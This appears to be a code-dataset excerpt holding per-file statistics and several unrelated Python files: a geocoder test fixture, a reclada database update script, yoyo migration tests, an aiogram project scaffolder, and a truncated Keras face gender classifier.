| 32.884615 | 78 | 0.580117 | 249 | 1,710 | 3.927711 | 0.37751 | 0.051125 | 0.07362 | 0.064417 | 0.216769 | 0.143149 | 0.0818 | 0 | 0 | 0 | 0 | 0.010408 | 0.325731 | 1,710 | 51 | 79 | 33.529412 | 0.837814 | 0.562573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.190476 | false | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
376b687ba9788b6a0541074221d59f6f3f6f83f8 | 1,672 | py | Python | tests/conftest.py | karolow/geocoder | e88014015a3ae2643203944401e7e4030948a635 | [
"MIT"
] | null | null | null | tests/conftest.py | karolow/geocoder | e88014015a3ae2643203944401e7e4030948a635 | [
"MIT"
] | null | null | null | tests/conftest.py | karolow/geocoder | e88014015a3ae2643203944401e7e4030948a635 | [
"MIT"
] | null | null | null | from collections import namedtuple
from pytest import fixture
from geocoder.geocoding import (
Addresses,
Coordinates,
)
@fixture
def mock_csv_coordinates(tmp_path):
data = [
"city,street,number,postal_code,state,lon,lat",
"Katowice,Armii Krajowej,102,40-671,istniejacy,259921.7313,498200.1764",
]
address = namedtuple('Address', data[0].split(','))
output = address(*data[1].split(','))
datafile = tmp_path / "coordinates.csv"
datafile.write_text("\n".join(data))
return str(datafile), output
@fixture
def mock_tuple_coordinates():
data = [
"city,street,number,postal_code,state,lon,lat",
"Katowice,Armii Krajowej,102,40-671,istniejacy,259921.7313,498200.1764",
"Katowice,Juliana Fałata,15,40-749,istniejacy,259301.2136,502763.3093",
"Katowice,Orlików,13,40-676,istniejacy,259152.4308,497821.8604",
]
address = namedtuple('Address', data[0].split(','))
return [address(*row.split(',')) for row in data[1:]]
@fixture
def mock_addresses():
csv_data = [
"city,street,number",
"Katowice,Armii Krajowej,102",
"Katowice,Jordana,20",
]
address = namedtuple('Address', csv_data[0].split(','))
return [address(*row.split(',')) for row in csv_data[1:]]
@fixture
def addr_instance(mock_addresses):
_, source_data = mock_addresses
instance = Addresses(source_data, street="street", number="number")
yield instance
@fixture
def coord_instance(mock_tuple_coordinates):
instance = Coordinates(mock_tuple_coordinates, street="street",
number="number", lat='lat', lon='lon')
yield instance
| 28.827586 | 80 | 0.668062 | 203 | 1,672 | 5.384236 | 0.359606 | 0.045746 | 0.038426 | 0.054895 | 0.307411 | 0.307411 | 0.254346 | 0.254346 | 0.254346 | 0.254346 | 0 | 0.088775 | 0.184809 | 1,672 | 57 | 81 | 29.333333 | 0.713133 | 0 | 0 | 0.326087 | 0 | 0 | 0.294856 | 0.184211 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.065217 | 0 | 0.23913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
376df6d7f89516a0e412a13d0db28bac87a6c75e | 7,176 | py | Python | update/update_db.py | reclada/db | 09dfdeaad8d1f48082aa0512eed7ba3394f1d737 | [
"Apache-2.0"
] | null | null | null | update/update_db.py | reclada/db | 09dfdeaad8d1f48082aa0512eed7ba3394f1d737 | [
"Apache-2.0"
] | 2 | 2021-06-04T11:42:27.000Z | 2021-06-04T16:16:21.000Z | update/update_db.py | reclada/db | 09dfdeaad8d1f48082aa0512eed7ba3394f1d737 | [
"Apache-2.0"
] | 2 | 2021-04-16T09:00:04.000Z | 2021-06-23T12:07:45.000Z | import os
import json
import stat
from pathlib import Path
import sys
import urllib.parse
import uuid
import shutil
os.chdir(os.path.dirname(os.path.abspath(__file__)))
j = ''
with open('update_config.json') as f:
j = f.read()
j = json.loads(j)
branch_db = j["branch_db"]
branch_runtime = j["branch_runtime"]
branch_SciNLP = j["branch_SciNLP"]
branch_QAAutotests = j["branch_QAAutotests"]
db_URI = j["db_URI"]
parsed = urllib.parse.urlparse(db_URI)
db_URI = db_URI.replace(parsed.password, urllib.parse.quote(parsed.password))
db_user = parsed.username
db = db_URI.split('/')[-1]
ENVIRONMENT_NAME = j["ENVIRONMENT_NAME"]
LAMBDA_NAME = j["LAMBDA_NAME"]
LAMBDA_REGION = j["LAMBDA_REGION"]
run_object_create = j["run_object_create"]
version = j["version"]
quick_install = j["quick_install"]
downgrade_test = j["downgrade_test"]
if version == 'latest':
config_version = 999999999
else:
config_version = int(version)
def psql_str(cmd:str,DB_URI:str = db_URI)->str:
return f'psql -t -P pager=off {cmd} {DB_URI}'
#zero = 'fbcc09e9f4f5b03f0f952b95df8b481ec83b6685\n'
def json_schema_install(DB_URI=db_URI):
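    # Clones gavinwahl/postgres-json-schema and patches its SQL so the functions
    # install into the public schema without requiring CREATE EXTENSION.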
file_name = 'patched.sql'
rmdir('postgres-json-schema')
os.system(f'git clone https://github.com/gavinwahl/postgres-json-schema.git')
os.chdir('postgres-json-schema')
with open('postgres-json-schema--0.1.1.sql') as s, open(file_name,'w') as d:
d.write(s.read().replace('@extschema@','public').replace('CREATE OR REPLACE FUNCTION ','CREATE OR REPLACE FUNCTION public.'))
run_file(file_name,DB_URI)
os.chdir('..')
rmdir('postgres-json-schema')
def install_objects(l_name=LAMBDA_NAME, l_region=LAMBDA_REGION, e_name=ENVIRONMENT_NAME, DB_URI=db_URI):
file_name = 'object_create_patched.sql'
with open('object_create.sql') as f:
obj_cr = f.read()
obj_cr = obj_cr.replace('#@#lname#@#', l_name)
obj_cr = obj_cr.replace('#@#lregion#@#', l_region)
obj_cr = obj_cr.replace('#@#ename#@#', e_name)
with open(file_name,'w') as f:
f.write(obj_cr)
run_file(file_name,DB_URI)
os.remove(file_name)
def run_file(file_name,DB_URI=db_URI):
cmd = psql_str(f'-f "{file_name}"',DB_URI)
os.system(cmd)
def run_cmd_scalar(command,DB_URI=db_URI)->str:
cmd = psql_str(f'-c "{command}"',DB_URI)
return os.popen(cmd).read().strip()
def checkout(to:str = branch_db):
cmd = f'git checkout {to} -q'
#print(cmd)
r = os.popen(cmd).read()
return r
def rmdir(top:str):
if os.path.exists(top) and os.path.isdir(top):
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
filename = os.path.join(root, name)
os.chmod(filename, stat.S_IWUSR)
os.remove(filename)
for name in dirs:
os.rmdir(os.path.join(root, name))
os.rmdir(top)
def clone_db():
rmdir('db')
os.chdir('..')
os.chdir('..')
folder_name = f'db_copy_{str(uuid.uuid4())}'
shutil.copytree('db',folder_name)
os.chdir(folder_name)
checkout('.')
os.chdir('..')
path = os.path.join('db','update','db')
shutil.move(folder_name, path)
os.chdir(path)
checkout(branch_db)
def get_commit_history(branch:str = branch_db, need_comment:bool = False):
checkout(branch)
res = os.popen(f'git log --pretty=format:"%H" --first-parent fbcc09e9f4f5b03f0f952b95df8b481ec83b6685..').readlines()
for i in range(len(res)):
res[i]=res[i].strip()
res.reverse()
if need_comment:
res2 = os.popen('git log --pretty=format:"%B" --first-parent fbcc09e9f4f5b03f0f952b95df8b481ec83b6685..').readlines()
while('\n' in res2):
res2.remove('\n')
for i in range(len(res2)):
s = res2[i]
            res2[i] = s[s.find('(')+1:s.find(')')]
res2.reverse()
pre_valid_commit = 0
i = 0
remove_index = []
for commit in res[:]:
commit_v = get_version_from_commit(commit)
os.chdir('update')
# validate commit_v
if pre_valid_commit + 1 == commit_v:
pre_valid_commit +=1
else:
remove_index.append(i)
print(f'\tcommit: {commit} is invalid')
i+=1
os.chdir('..')
for i in reversed(remove_index):
del res[i]
if need_comment:
del res2[i]
if need_comment:
return res, res2
return res
def get_version_from_db(DB_URI=db_URI)->int:
return int(run_cmd_scalar("select max(ver) from dev.ver;",DB_URI))
def get_version_from_commit(commit = '', file_name = 'up_script.sql')->int:
if commit != '':
checkout(commit)
cd = Path('update').exists()
if cd:
os.chdir('update')
commit_v = -1
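    # The script is expected to carry a header line such as "-- version = 42".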
if not Path(file_name).exists():
return commit_v
with open(file_name, encoding='utf8') as f:
for line in f:
p = '-- version ='
if line.startswith(p):
commit_v = int(line.replace(p,''))
break
if cd:
os.chdir('..')
return commit_v
def recreate_db():
splt = db_URI.split('/')
splt[-1] = 'postgres'
db_URI_postgres = '/'.join(splt)
def execute(cmd:str):
os.system(psql_str(f'-c "{cmd}"', db_URI_postgres))
execute(f'''REVOKE CONNECT ON DATABASE {db} FROM PUBLIC, {db_user};''')
execute(f'''SELECT pg_terminate_backend(pid) '''
+ f''' FROM pg_stat_activity '''
+ f''' WHERE pid <> pg_backend_pid() '''
+ f''' AND datname = '{db}'; ''')
execute(f'''DROP DATABASE {db};''')
execute(f'''CREATE DATABASE {db};''')
def run_test():
rmdir('QAAutotests')
os.system(f'git clone https://github.com/reclada/QAAutotests')
os.chdir('QAAutotests')
os.system(f'git checkout {branch_QAAutotests}')
os.system(f'pip install -r requirements.txt')
os.system(f'pytest '
+ 'tests/components/security/test_database_sql_injections.py '
+ 'tests/components/database '
+ 'tests/components/postgrest '
+ '--alluredir results --log-file=test_output.log')
os.chdir('..')
rmdir('QAAutotests')
if __name__ == "__main__":
DB_URI = db_URI
if len(sys.argv) > 1:
DB_URI = sys.argv[1]
clone_db()
cur_ver_db = get_version_from_db(DB_URI)
    print(f'current database version: {cur_ver_db}')
res = get_commit_history(branch_db)
#res = res[cur_ver:]
if len(res) == 0:
        print('There are no updates')
else:
for commit in res:
commit_v = get_version_from_commit(commit)
os.chdir('update')
print(f'commit: {commit}\tcommit_version: {commit_v}')
if commit_v == cur_ver_db + 1:
print('\trun')
os.system('python create_up.sql.py')
run_file('up.sql',DB_URI)
cur_ver_db+=1
else:
print(f'\talready applied')
os.chdir('..')
if cur_ver_db == config_version:
break
os.chdir('..')
rmdir('db') | 28.589641 | 133 | 0.603958 | 1,000 | 7,176 | 4.131 | 0.216 | 0.038732 | 0.013556 | 0.019366 | 0.134834 | 0.088114 | 0.054708 | 0.044057 | 0.029049 | 0.029049 | 0 | 0.019561 | 0.244844 | 7,176 | 251 | 134 | 28.589641 | 0.742757 | 0.013657 | 0 | 0.178571 | 0 | 0 | 0.237173 | 0.049611 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.005102 | 0.040816 | 0.010204 | 0.153061 | 0.030612 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
376fcab57617bb6cde8c9472e7ac7b41d22d82ce | 15,579 | py | Python | yoyo/tests/test_migrations.py | emurphy/yoyo | f9a32d5448970da3a81041692420d5def490b7b0 | [
"Apache-2.0"
] | null | null | null | yoyo/tests/test_migrations.py | emurphy/yoyo | f9a32d5448970da3a81041692420d5def490b7b0 | [
"Apache-2.0"
] | null | null | null | yoyo/tests/test_migrations.py | emurphy/yoyo | f9a32d5448970da3a81041692420d5def490b7b0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Oliver Cope
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from mock import Mock, patch
from yoyo.connections import get_backend
from yoyo import read_migrations
from yoyo import exceptions
from yoyo import ancestors, descendants
from yoyo.tests import with_migrations, migrations_dir, dburi
from yoyo.migrations import topological_sort, MigrationList
from yoyo.scripts import newmigration
@with_migrations(
"""
step("CREATE TABLE _yoyo_test (id INT)")
""",
"""
step("INSERT INTO _yoyo_test VALUES (1)")
step("INSERT INTO _yoyo_test VALUES ('x', 'y')")
""")
def test_transaction_is_not_committed_on_error(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
with pytest.raises(backend.DatabaseError):
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT count(1) FROM _yoyo_test")
assert cursor.fetchone() == (0,)
@with_migrations(
'step("CREATE TABLE _yoyo_test (id INT)")',
'''
step("INSERT INTO _yoyo_test VALUES (1)", "DELETE FROM _yoyo_test WHERE id=1")
step("UPDATE _yoyo_test SET id=2 WHERE id=1", "UPDATE _yoyo_test SET id=1 WHERE id=2")
'''
)
def test_rollbacks_happen_in_reverse(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == [(2,)]
backend.rollback_migrations(migrations)
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == []
@with_migrations(
'''
step("CREATE TABLE _yoyo_test (id INT)")
step("INSERT INTO _yoyo_test VALUES (1)")
step("INSERT INTO _yoyo_test VALUES ('a', 'b')", ignore_errors='all')
step("INSERT INTO _yoyo_test VALUES (2)")
'''
)
def test_execution_continues_with_ignore_errors(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == [(1,), (2,)]
@with_migrations(
'''
from yoyo import step, group
step("CREATE TABLE _yoyo_test (id INT)")
group(
step("INSERT INTO _yoyo_test VALUES (1)"),
step("INSERT INTO _yoyo_test VALUES ('a', 'b')"),
ignore_errors='all'
)
step("INSERT INTO _yoyo_test VALUES (2)")
'''
)
def test_execution_continues_with_ignore_errors_in_transaction(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == [(2,)]
@with_migrations(
'''
step("CREATE TABLE _yoyo_test (id INT)")
step("INSERT INTO _yoyo_test VALUES (1)",
"DELETE FROM _yoyo_test WHERE id=2")
step("UPDATE _yoyo_test SET id=2 WHERE id=1",
"SELECT nonexistent FROM imaginary", ignore_errors='rollback')
'''
)
def test_rollback_ignores_errors(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == [(2,)]
backend.rollback_migrations(migrations)
cursor.execute("SELECT * FROM _yoyo_test")
assert cursor.fetchall() == []
def test_migration_is_committed(backend_fixture):
with migrations_dir('step("CREATE TABLE _yoyo_test (id INT)")') as tmpdir:
migrations = read_migrations(tmpdir)
backend_fixture.apply_migrations(migrations)
backend_fixture.rollback()
rows = backend_fixture.execute("SELECT * FROM _yoyo_test").fetchall()
assert list(rows) == []
def test_rollback_happens_on_step_failure(backend_fixture):
with migrations_dir('''
step("",
"CREATE TABLE _yoyo_is_rolledback (i INT)"),
step("CREATE TABLE _yoyo_test (s VARCHAR(100))",
"DROP TABLE _yoyo_test")
step("invalid sql!")''') as tmpdir:
migrations = read_migrations(tmpdir)
with pytest.raises(backend_fixture.DatabaseError):
backend_fixture.apply_migrations(migrations)
        # The _yoyo_test table should have either been rolled back (transactional
        # DDL) or explicitly dropped (non-transactional DDL)
with pytest.raises(backend_fixture.DatabaseError):
backend_fixture.execute("SELECT * FROM _yoyo_test")
# Transactional DDL: rollback steps not executed
if backend_fixture.has_transactional_ddl:
with pytest.raises(backend_fixture.DatabaseError):
backend_fixture.execute("SELECT * FROM _yoyo_is_rolledback")
# Non-transactional DDL: ensure the rollback steps were executed
else:
cursor = backend_fixture.execute("SELECT * FROM _yoyo_is_rolledback")
assert list(cursor.fetchall()) == []
@with_migrations(
'''
step("CREATE TABLE _yoyo_test (id INT)")
step("DROP TABLE _yoyo_test")
'''
)
def test_specify_migration_table(tmpdir):
backend = get_backend(dburi, migration_table='another_migration_table')
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT id FROM another_migration_table")
assert cursor.fetchall() == [('0',)]
@with_migrations(
'''
def foo(conn):
conn.cursor().execute("CREATE TABLE foo_test (id INT)")
conn.cursor().execute("INSERT INTO foo_test VALUES (1)")
def bar(conn):
foo(conn)
step(bar)
'''
)
def test_migration_functions_have_namespace_access(tmpdir):
"""
Test that functions called via step have access to the script namespace
"""
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT id FROM foo_test")
assert cursor.fetchall() == [(1,)]
@with_migrations(
'''
from yoyo import group, step
step("CREATE TABLE _yoyo_test (id INT)")
group(step("INSERT INTO _yoyo_test VALUES (1)")),
'''
)
def test_migrations_can_import_step_and_group(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
cursor = backend.cursor()
cursor.execute("SELECT id FROM _yoyo_test")
assert cursor.fetchall() == [(1,)]
@with_migrations(
'''
step("CREATE TABLE _yoyo_test (id INT, c VARCHAR(1))")
step("INSERT INTO _yoyo_test VALUES (1, 'a')")
step("INSERT INTO _yoyo_test VALUES (2, 'b')")
step("SELECT * FROM _yoyo_test")
'''
)
def test_migrations_display_selected_data(tmpdir):
backend = get_backend(dburi)
migrations = read_migrations(tmpdir)
with patch('yoyo.migrations.stdout') as stdout:
backend.apply_migrations(migrations)
written = ''.join(a[0] for a, kw in stdout.write.call_args_list)
assert written == (' id | c \n'
'----+---\n'
' 1 | a \n'
' 2 | b \n'
'(2 rows)\n')
class TestTopologicalSort(object):
def get_mock_migrations(self):
class MockMigration(Mock):
def __repr__(self):
return "<MockMigration {}>".format(self.id)
return [MockMigration(id='m1', depends=set()),
MockMigration(id='m2', depends=set()),
MockMigration(id='m3', depends=set()),
MockMigration(id='m4', depends=set())]
def test_it_keeps_stable_order(self):
m1, m2, m3, m4 = self.get_mock_migrations()
assert list(topological_sort([m1, m2, m3, m4])) == [m1, m2, m3, m4]
assert list(topological_sort([m4, m3, m2, m1])) == [m4, m3, m2, m1]
def test_it_sorts_topologically(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m3.depends.add(m4)
assert list(topological_sort([m1, m2, m3, m4])) == [m4, m3, m1, m2]
def test_it_brings_depended_upon_migrations_to_the_front(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m1.depends.add(m4)
assert list(topological_sort([m1, m2, m3, m4])) == [m4, m1, m2, m3]
def test_it_discards_missing_dependencies(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m3.depends.add(Mock())
assert list(topological_sort([m1, m2, m3, m4])) == [m1, m2, m3, m4]
def test_it_catches_cycles(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m3.depends.add(m3)
with pytest.raises(exceptions.BadMigration):
list(topological_sort([m1, m2, m3, m4]))
def test_it_handles_multiple_edges_to_the_same_node(self):
m1, m2, m3, m4 = self.get_mock_migrations()
m2.depends.add(m1)
m3.depends.add(m1)
m4.depends.add(m1)
assert list(topological_sort([m1, m2, m3, m4])) == [m1, m2, m3, m4]
class TestMigrationList(object):
def test_can_create_empty(self):
m = MigrationList()
assert list(m) == []
def test_cannot_create_with_duplicate_ids(self):
with pytest.raises(exceptions.MigrationConflict):
MigrationList([Mock(id=1), Mock(id=1)])
def test_can_append_new_id(self):
m = MigrationList([Mock(id=n) for n in range(10)])
m.append(Mock(id=10))
def test_cannot_append_duplicate_id(self):
m = MigrationList([Mock(id=n) for n in range(10)])
with pytest.raises(exceptions.MigrationConflict):
m.append(Mock(id=1))
def test_deletion_allows_reinsertion(self):
m = MigrationList([Mock(id=n) for n in range(10)])
del m[0]
m.append(Mock(id=0))
def test_can_overwrite_slice_with_same_ids(self):
m = MigrationList([Mock(id=n) for n in range(10)])
m[1:3] = [Mock(id=2), Mock(id=1)]
def test_cannot_overwrite_slice_with_conflicting_ids(self):
m = MigrationList([Mock(id=n) for n in range(10)])
with pytest.raises(exceptions.MigrationConflict):
m[1:3] = [Mock(id=4)]
class TestAncestorsDescendants(object):
def setup(self):
self.m1 = Mock(id='m1', depends=['m2', 'm3'])
self.m2 = Mock(id='m2', depends=['m3'])
self.m3 = Mock(id='m3', depends=['m5'])
self.m4 = Mock(id='m4', depends=['m5'])
self.m5 = Mock(id='m5', depends=[])
self.m1.depends = {self.m2, self.m3}
self.m2.depends = {self.m3}
self.m3.depends = {self.m5}
self.m4.depends = {self.m5}
self.migrations = {self.m1, self.m2, self.m3, self.m4, self.m5}
def test_ancestors(self):
assert ancestors(self.m1, self.migrations) == {self.m2, self.m3,
self.m5}
assert ancestors(self.m2, self.migrations) == {self.m3, self.m5}
assert ancestors(self.m3, self.migrations) == {self.m5}
assert ancestors(self.m4, self.migrations) == {self.m5}
assert ancestors(self.m5, self.migrations) == set()
def test_descendants(self):
assert descendants(self.m1, self.migrations) == set()
assert descendants(self.m2, self.migrations) == {self.m1}
assert descendants(self.m3, self.migrations) == {self.m2, self.m1}
assert descendants(self.m4, self.migrations) == set()
assert descendants(self.m5, self.migrations) == {self.m4, self.m3,
self.m2, self.m1}
class TestReadMigrations(object):
@with_migrations(**{newmigration.tempfile_prefix + 'test': ''})
def test_it_ignores_yoyo_new_tmp_files(self, tmpdir):
"""
The yoyo new command creates temporary files in the migrations directory.
These shouldn't be picked up by yoyo apply etc
"""
assert len(read_migrations(tmpdir)) == 0
@with_migrations(**{'post-apply': '''step('SELECT 1')'''})
def test_it_loads_post_apply_scripts(self, tmpdir):
migrations = read_migrations(tmpdir)
assert len(migrations) == 0
assert len(migrations.post_apply) == 1
@with_migrations(**{'a': '''step('SELECT 1')'''})
def test_it_does_not_add_duplicate_steps(self, tmpdir):
m = read_migrations(tmpdir)[0]
m.load()
assert len(m.steps) == 1
m = read_migrations(tmpdir)[0]
m.load()
assert len(m.steps) == 1
@with_migrations(**{'a': '''from yoyo import step; step('SELECT 1')'''})
def test_it_does_not_add_duplicate_steps_with_imported_symbols(self, tmpdir):
m = read_migrations(tmpdir)[0]
m.load()
assert len(m.steps) == 1
m = read_migrations(tmpdir)[0]
m.load()
assert len(m.steps) == 1
class TestPostApplyHooks(object):
def test_post_apply_hooks_are_run_every_time(self):
backend = get_backend(dburi)
migrations = migrations_dir(
**{'a': "step('create table postapply (i int)')",
'post-apply': "step('insert into postapply values (1)')"})
with migrations as tmp:
def count_postapply_calls():
cursor = backend.cursor()
cursor.execute("SELECT count(1) FROM postapply")
return cursor.fetchone()[0]
def _apply_migrations():
backend.apply_migrations(
backend.to_apply(read_migrations(tmp)))
# Should apply migration 'a' and call the post-apply hook
_apply_migrations()
assert count_postapply_calls() == 1
# No outstanding migrations: post-apply hook should not be called
_apply_migrations()
assert count_postapply_calls() == 1
# New migration added: post-apply should be called a second time
migrations.add_migration('b', '')
_apply_migrations()
assert count_postapply_calls() == 2
@with_migrations(**{
'a': "step('create table postapply (i int)')",
'post-apply': "step('insert into postapply values (1)')",
'post-apply2': "step('insert into postapply values (2)')"})
def test_it_runs_multiple_post_apply_hooks(self, tmpdir):
backend = get_backend(dburi)
backend.apply_migrations(backend.to_apply(read_migrations(tmpdir)))
cursor = backend.cursor()
cursor.execute("SELECT * FROM postapply")
assert cursor.fetchall() == [(1,), (2,)]
@with_migrations(**{
'a': "step('create table postapply (i int)')",
'post-apply': "step('insert into postapply values (1)')"})
def test_apply_migrations_only_does_not_run_hooks(self, tmpdir):
backend = get_backend(dburi)
backend.apply_migrations_only(backend.to_apply(read_migrations(tmpdir)))
cursor = backend.cursor()
cursor.execute("SELECT * FROM postapply")
assert cursor.fetchall() == []
| 35.649886 | 86 | 0.642275 | 1,950 | 15,579 | 4.926667 | 0.144615 | 0.034975 | 0.039554 | 0.012491 | 0.588633 | 0.525034 | 0.506089 | 0.457895 | 0.435516 | 0.404393 | 0 | 0.020156 | 0.232492 | 15,579 | 436 | 87 | 35.731651 | 0.783307 | 0.073368 | 0 | 0.417857 | 0 | 0 | 0.107761 | 0.005396 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.135714 | false | 0 | 0.042857 | 0.003571 | 0.210714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
377084db60ebee117b24913239fec5ff9e73b737 | 2,613 | py | Python | aiogram_oop_framework/core/project.py | drforse/aiogram_oop_framework | ee56b6a0893300fea43f01c2f4c4ea8b5fae1424 | [
"MIT"
] | null | null | null | aiogram_oop_framework/core/project.py | drforse/aiogram_oop_framework | ee56b6a0893300fea43f01c2f4c4ea8b5fae1424 | [
"MIT"
] | null | null | null | aiogram_oop_framework/core/project.py | drforse/aiogram_oop_framework | ee56b6a0893300fea43f01c2f4c4ea8b5fae1424 | [
"MIT"
] | null | null | null | from pathlib import Path
from aiogram_oop_framework.core.funcs import get_init_py


class ProjectStructure:
    def __init__(self, project: 'Project'):
        self.root: Path = project.path / project.name
        self.directories = {'root': {'directory': self.root, 'tree': {}}}

    def add_dir_to_root(self, name: str):
        path = self.root / name
        self.directories['root']['tree'][name] = {'directory': path, 'tree': {}}

    def add_dir(self, path: str, name: str):
        """
        :param path: any_dir.another_dir (found in project root)
        :param name: dir_name
        """
        path_steps = path.split('.')
        current_step = self.directories['root']
        for step in path_steps:
            current_step = current_step['tree'][step]
        path = current_step['directory'] / name
        current_step['tree'][name] = {'directory': path, 'tree': {}}

    def include(self, path: str):
        """
        Creates the folders in the path which aren't created yet.

        :param path: any_dir.another_dir (found in project root)
        """
        path_steps = path.split('.')
        current_step = self.directories['root']
        for step in path_steps:
            current_step_struc = current_step['tree'].get(step)
            if current_step_struc:
                current_step = current_step_struc
            else:
                current_step['tree'][step] = {'directory': current_step['directory'] / step, 'tree': {}}
                current_step = current_step['tree'][step]

    def apply_changes(self):
        def create_dirs(tree: dict):
            # create each missing directory (with an empty __init__.py), then recurse
            for directory in tree:
                path: Path = tree[directory]['directory']
                if not path.exists():
                    path.mkdir()
                    with open(path / '__init__.py', 'w') as f:
                        f.write('\n')
                create_dirs(tree[directory]['tree'])

        create_dirs(self.directories['root']['tree'])


class Project:
    def __init__(self, name: str, path: Path = None):
        self.name: str = name
        self.path: Path = path
        self.structure: ProjectStructure = None

    def create(self, default=True):
        if not self.path:
            self.path = Path.cwd()
        path = self.path / self.name
        path.mkdir()
        get_init_py(path, self.name)
        if default and not self.structure:
            self.structure = ProjectStructure(self)
            self.structure.include('views')
        # apply once, whether the structure is the default or user supplied
        if self.structure:
            self.structure.apply_changes()
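

# Illustrative usage sketch (not part of the original module); the project
# name 'my_bot' and the 'handlers.admin' package path are hypothetical:
#
#   project = Project('my_bot')
#   project.create()                              # my_bot/ plus the default views/
#   project.structure.include('handlers.admin')   # register nested packages
#   project.structure.apply_changes()             # create them on disk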
| 34.381579 | 104 | 0.566781 | 304 | 2,613 | 4.700658 | 0.236842 | 0.115465 | 0.06648 | 0.046186 | 0.279916 | 0.249825 | 0.176347 | 0.176347 | 0.176347 | 0.176347 | 0 | 0 | 0.307692 | 2,613 | 75 | 105 | 34.84 | 0.789939 | 0.083046 | 0 | 0.188679 | 0 | 0 | 0.068653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.150943 | false | 0 | 0.037736 | 0 | 0.226415 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37756f838d9a991c6fb09146913f58963f4cf285 | 3,149 | py | Python | gender_detection_keras.py | matejcrnac/Face_deidentification_kazemi | 434fff49b5a7b555bb3c56a62915fd502e0b75f9 | [
"MIT"
] | 1 | 2019-03-27T10:30:54.000Z | 2019-03-27T10:30:54.000Z | gender_detection_keras.py | matejcrnac/Face_deidentification_kazemi | 434fff49b5a7b555bb3c56a62915fd502e0b75f9 | [
"MIT"
] | null | null | null | gender_detection_keras.py | matejcrnac/Face_deidentification_kazemi | 434fff49b5a7b555bb3c56a62915fd502e0b75f9 | [
"MIT"
] | null | null | null | #Classifier 1-------------------------------------------------------------
# author: Arun Ponnusamy
# website: https://www.arunponnusamy.com

# import necessary packages
from keras.preprocessing.image import img_to_array
from keras.models import load_model
import numpy as np
import cv2
import cvlib as cv


class GenderDetectKeras:
    def __init__(self, model_path):
        self.model = load_model(model_path)

    # 0 - man
    # 1 - woman
    def predict(self, image_path, confidence=False):
        # read input image
        image = cv2.imread(image_path)
        if image is None:
            raise ValueError("Could not read input image: %s" % image_path)

        # detect faces in the image; the detection confidences are kept in a
        # separate variable so they do not shadow the `confidence` flag
        faces, detection_confidence = cv.detect_face(image)

        # get corner points of the first face rectangle
        face = faces[0]
        (startX, startY) = face[0], face[1]
        (endX, endY) = face[2], face[3]

        # crop the detected face region
        face_crop = np.copy(image[startY:endY, startX:endX])

        # preprocessing for the gender detection model
